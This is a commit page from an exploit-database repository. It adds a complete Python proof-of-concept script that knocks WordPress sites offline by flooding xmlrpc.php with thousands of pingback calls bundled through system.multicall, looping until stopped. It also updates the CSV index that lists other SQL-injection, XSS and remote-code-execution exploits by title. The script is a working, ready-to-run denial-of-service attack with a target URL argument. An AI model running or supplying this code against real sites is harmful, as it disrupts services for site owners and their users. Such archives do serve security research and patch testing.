DB: 2019-12-22
1 changes to exploits/shellcodes Wordpress FooGallery 1.8.12 - Persistent Cross-Site Scripting Wordpress Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting Wordpress Popup Builder 3.49 - Persistent Cross-Site Scripting WordPress Plugin FooGallery 1.8.12 - Persistent Cross-Site Scripting WordPress Plugin Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting WordPress Plugin Popup Builder 3.49 - Persistent Cross-Site Scripting Wordpress Sliced Invoices 3.8.2 - 'post' SQL Injection WordPress Plugin Sliced Invoices 3.8.2 - 'post' SQL Injection Wordpress 5.2.4 - Cross-Origin Resource Sharing WordPress Core 5.2.4 - Cross-Origin Resource Sharing Wordpress Plugin Google Review Slider 6.1 - 'tid' SQL Injection WordPress Plugin Google Review Slider 6.1 - 'tid' SQL Injection Wordpress 5.3 - User Disclosure WordPress Core 5.3 - User Disclosure WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service
This commit is contained in:
Offensive Security
parent
e3e102da5b
commit
0e3474b2ca
2 changed files with 111 additions and 7 deletions
103
exploits/php/webapps/47800.py
Executable file
103
exploits/php/webapps/47800.py
Executable file
|
|
@ -0,0 +1,103 @@
|
|||
#!/usr/bin/env python
|
||||
# WordPress <= 5.3.? Denial-of-Service PoC
|
||||
# Abusing pingbacks+xmlrpc multicall to exhaust connections
|
||||
# @roddux 2019 | Arcturus Security | labs.arcturus.net
|
||||
# TODO:
|
||||
# - Try and detect a pingback URL on target site
|
||||
# - Optimise number of entries per request, check class-wp-xmlrpc-server.php
|
||||
from urllib.parse import urlparse
|
||||
import sys, uuid, urllib3, requests
|
||||
urllib3.disable_warnings()
|
||||
|
||||
DEBUG = True
|
||||
def dprint(X):
|
||||
if DEBUG: print(X)
|
||||
|
||||
COUNT=0
|
||||
def build_entry(pingback,target):
|
||||
global COUNT
|
||||
COUNT +=1
|
||||
entry = "<value><struct><member><name>methodName</name><value>pingback.ping</value></member><member>"
|
||||
entry += f"<name>params</name><value><array><data><value>{pingback}/{COUNT}</value>"
|
||||
#entry += f"<name>params</name><value><array><data><value>{pingback}/{uuid.uuid4()}</value>"
|
||||
entry += f"<value>{target}/?p=1</value></data></array></value></member></struct></value>"
|
||||
#entry += f"<value>{target}/#e</value></data></array></value></member></struct></value>" # taxes DB more
|
||||
return entry
|
||||
|
||||
def build_request(pingback,target,entries):
|
||||
prefix = "<methodCall><methodName>system.multicall</methodName><params><param><array>"
|
||||
suffix = "</array></param></params></methodCall>"
|
||||
request = prefix
|
||||
for _ in range(0,entries): request += build_entry(pingback,target)
|
||||
request += suffix
|
||||
return request
|
||||
|
||||
def usage_die():
|
||||
print(f"[!] Usage: {sys.argv[0]} <check/attack> <pingback url> <target url>")
|
||||
exit(1)
|
||||
|
||||
def get_args():
|
||||
if len(sys.argv) != 4: usage_die()
|
||||
action = sys.argv[1]
|
||||
pingback = sys.argv[2]
|
||||
target = sys.argv[3]
|
||||
if action not in ("check","attack"): usage_die()
|
||||
for URL in (pingback,target):
|
||||
res = urlparse(URL)
|
||||
if not all((res.scheme,res.netloc)): usage_die()
|
||||
return (action,pingback,target)
|
||||
|
||||
def main(action,pingback,target):
|
||||
print("[>] WordPress <= 5.3.? Denial-of-Service PoC")
|
||||
print("[>] @roddux 2019 | Arcturus Security | labs.arcturus.net")
|
||||
# he checc
|
||||
if action == "check": entries = 2
|
||||
# he attacc
|
||||
elif action == "attack": entries = 2000
|
||||
# but most importantly
|
||||
print(f"[+] Running in {action} mode")
|
||||
# he pingbacc
|
||||
print(f"[+] Got pingback URL \"{pingback}\"")
|
||||
print(f"[+] Got target URL \"{target}\"")
|
||||
print(f"[+] Building {entries} pingback calls")
|
||||
# entries = 1000 # TESTING
|
||||
xmldata = build_request(pingback,target,entries)
|
||||
dprint("[+] Request:\n")
|
||||
dprint(xmldata+"\n")
|
||||
print(f"[+] Request size: {len(xmldata)} bytes")
|
||||
if action == "attack":
|
||||
print("[+] Starting attack loop, CTRL+C to stop...")
|
||||
rcount = 0
|
||||
try:
|
||||
while True:
|
||||
try:
|
||||
resp = requests.post(f"{target}/xmlrpc.php", xmldata, verify=False, allow_redirects=False, timeout=.2)
|
||||
#dprint(resp.content.decode("UTF-8")[0:500]+"\n")
|
||||
if resp.status_code != 200:
|
||||
print(f"[!] Received odd status ({resp.status_code}) -- DoS successful?")
|
||||
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
|
||||
pass
|
||||
rcount += 1
|
||||
print(f"\r[+] Requests sent: {rcount}",end="")
|
||||
except KeyboardInterrupt:
|
||||
print("\n[>] Attack finished",end="\n\n")
|
||||
exit(0)
|
||||
elif action == "check":
|
||||
print("[+] Sending check request")
|
||||
try:
|
||||
resp = requests.post(f"{target}/xmlrpc.php", xmldata, verify=False, allow_redirects=False, timeout=10)
|
||||
if resp.status_code != 200:
|
||||
print(f"[!] Received odd status ({resp.status_code}) -- check target url")
|
||||
print("[+] Request sent")
|
||||
print("[+] Response headers:\n")
|
||||
print(resp.headers)
|
||||
print("[+] Response dump:")
|
||||
print(resp.content.decode("UTF-8"))
|
||||
print("[+] Here's the part where you figure out if it's vulnerable, because I CBA to code it")
|
||||
except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
|
||||
print("[!] Connection error")
|
||||
exit(1)
|
||||
print("[>] Check finished")
|
||||
|
||||
if __name__ == "__main__":
|
||||
main(*get_args())
|
||||
|
|
@ -41991,14 +41991,14 @@ id,file,description,date,author,type,platform,port
|
|||
47613,exploits/aspx/webapps/47613.txt,"Adrenalin Core HCM 5.4.0 - 'prntDDLCntrlName' Reflected Cross-Site Scripting",2019-11-12,Cy83rl0gger,webapps,aspx,
|
||||
47614,exploits/hardware/webapps/47614.txt,"Computrols CBAS-Web 19.0.0 - 'username' Reflected Cross-Site Scripting",2019-11-12,LiquidWorm,webapps,hardware,
|
||||
47611,exploits/aspx/webapps/47611.txt,"Adrenalin Core HCM 5.4.0 - 'strAction' Reflected Cross-Site Scripting",2019-11-12,Cy83rl0gger,webapps,aspx,
|
||||
47516,exploits/php/webapps/47516.txt,"Wordpress FooGallery 1.8.12 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
|
||||
47517,exploits/php/webapps/47517.txt,"Wordpress Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
|
||||
47518,exploits/php/webapps/47518.txt,"Wordpress Popup Builder 3.49 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
|
||||
47516,exploits/php/webapps/47516.txt,"WordPress Plugin FooGallery 1.8.12 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
|
||||
47517,exploits/php/webapps/47517.txt,"WordPress Plugin Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
|
||||
47518,exploits/php/webapps/47518.txt,"WordPress Plugin Popup Builder 3.49 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
|
||||
47520,exploits/php/webapps/47520.py,"Restaurant Management System 1.0 - Remote Code Execution",2019-10-17,"Ibad Shah",webapps,php,
|
||||
47524,exploits/php/webapps/47524.py,"Joomla! 3.4.6 - Remote Code Execution",2019-10-18,"Alessandro Groppo",webapps,php,
|
||||
47537,exploits/linux/webapps/47537.txt,"Rocket.Chat 2.1.0 - Cross-Site Scripting",2019-10-23,3H34N,webapps,linux,
|
||||
47539,exploits/php/webapps/47539.rb,"Joomla! 3.4.6 - Remote Code Execution (Metasploit)",2019-10-23,"Alessandro Groppo",webapps,php,
|
||||
47540,exploits/php/webapps/47540.txt,"Wordpress Sliced Invoices 3.8.2 - 'post' SQL Injection",2019-10-24,"Lucian Ioan Nitescu",webapps,php,
|
||||
47540,exploits/php/webapps/47540.txt,"WordPress Plugin Sliced Invoices 3.8.2 - 'post' SQL Injection",2019-10-24,"Lucian Ioan Nitescu",webapps,php,
|
||||
47541,exploits/hardware/webapps/47541.txt,"AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control",2019-10-24,Luca.Chiou,webapps,hardware,
|
||||
47542,exploits/hardware/webapps/47542.txt,"AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection",2019-10-24,Luca.Chiou,webapps,hardware,
|
||||
47544,exploits/php/webapps/47544.py,"ClonOs WEB UI 19.09 - Improper Access Control",2019-10-25,"İbrahim Hakan Şeker",webapps,php,
|
||||
|
|
@ -42009,11 +42009,11 @@ id,file,description,date,author,type,platform,port
|
|||
47550,exploits/php/webapps/47550.txt,"delpino73 Blue-Smiley-Organizer 1.32 - 'datetime' SQL Injection",2019-10-28,cakes,webapps,php,
|
||||
47553,exploits/php/webapps/47553.md,"PHP-FPM + Nginx - Remote Code Execution",2019-10-28,"Emil Lerner",webapps,php,
|
||||
47555,exploits/php/webapps/47555.py,"rConfig 3.9.2 - Remote Code Execution",2019-10-29,Askar,webapps,php,
|
||||
47557,exploits/php/webapps/47557.txt,"Wordpress 5.2.4 - Cross-Origin Resource Sharing",2019-10-29,"Milad Khoshdel",webapps,php,
|
||||
47557,exploits/php/webapps/47557.txt,"WordPress Core 5.2.4 - Cross-Origin Resource Sharing",2019-10-29,"Milad Khoshdel",webapps,php,
|
||||
47560,exploits/json/webapps/47560.rb,"Ajenti 2.1.31 - Remote Code Exection (Metasploit)",2019-10-30,"Onur ER",webapps,json,
|
||||
47561,exploits/xml/webapps/47561.txt,"Citrix StoreFront Server 7.15 - XML External Entity Injection",2019-10-30,"Vahagn Vardanyan",webapps,xml,
|
||||
47562,exploits/hardware/webapps/47562.sh,"iSeeQ Hybrid DVR WH-H4 2.0.0.P - (get_jpeg) Stream Disclosure",2019-10-30,LiquidWorm,webapps,hardware,
|
||||
47567,exploits/php/webapps/47567.txt,"Wordpress Plugin Google Review Slider 6.1 - 'tid' SQL Injection",2019-10-31,"Princy Edward",webapps,php,
|
||||
47567,exploits/php/webapps/47567.txt,"WordPress Plugin Google Review Slider 6.1 - 'tid' SQL Injection",2019-10-31,"Princy Edward",webapps,php,
|
||||
47569,exploits/php/webapps/47569.txt,"TheJshen contentManagementSystem 1.04 - 'id' SQL Injection",2019-11-01,cakes,webapps,php,
|
||||
47571,exploits/linux/webapps/47571.txt,"ownCloud 10.3.0 stable - Cross-Site Request Forgery",2019-11-01,"Ozer Goker",webapps,linux,
|
||||
47572,exploits/java/webapps/47572.py,"Apache Solr 8.2.0 - Remote Code Execution",2019-11-01,@l3x_wong,webapps,java,
|
||||
|
|
@ -42070,7 +42070,7 @@ id,file,description,date,author,type,platform,port
|
|||
47691,exploits/php/webapps/47691.sh,"OpenNetAdmin 18.1.1 - Remote Code Execution",2019-11-20,mattpascoe,webapps,php,
|
||||
47702,exploits/hardware/webapps/47702.txt,"TestLink 1.9.19 - Persistent Cross-Site Scripting",2019-11-21,"Milad Khoshdel",webapps,hardware,
|
||||
47704,exploits/hardware/webapps/47704.txt,"Network Management Card 6.2.0 - Host Header Injection",2019-11-21,"Amal E Thamban",webapps,hardware,
|
||||
47720,exploits/php/webapps/47720.txt,"Wordpress 5.3 - User Disclosure",2019-11-28,SajjadBnd,webapps,php,
|
||||
47720,exploits/php/webapps/47720.txt,"WordPress Core 5.3 - User Disclosure",2019-11-28,SajjadBnd,webapps,php,
|
||||
47722,exploits/android/webapps/47722.py,"Mersive Solstice 2.8.0 - Remote Code Execution",2019-11-28,"Alexandre Teyar",webapps,android,
|
||||
47725,exploits/php/webapps/47725.txt,"Online Inventory Manager 3.2 - Persistent Cross-Site Scripting",2019-11-29,"Cemal Cihad ÇİFTÇİ",webapps,php,
|
||||
47730,exploits/php/webapps/47730.txt,"SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery",2019-12-02,LiquidWorm,webapps,php,
|
||||
|
|
@ -42106,3 +42106,4 @@ id,file,description,date,author,type,platform,port
|
|||
47793,exploits/aspx/webapps/47793.txt,"Telerik UI - Remote Code Execution via Insecure Deserialization",2019-12-18,"Bishop Fox",webapps,aspx,
|
||||
47796,exploits/hardware/webapps/47796.txt,"Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation",2019-12-19,Vulnerability-Lab,webapps,hardware,
|
||||
47798,exploits/php/webapps/47798.txt,"phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting",2019-12-20,"Chris Inzinga",webapps,php,
|
||||
47800,exploits/php/webapps/47800.py,"WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service",2019-12-17,roddux,webapps,php,
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue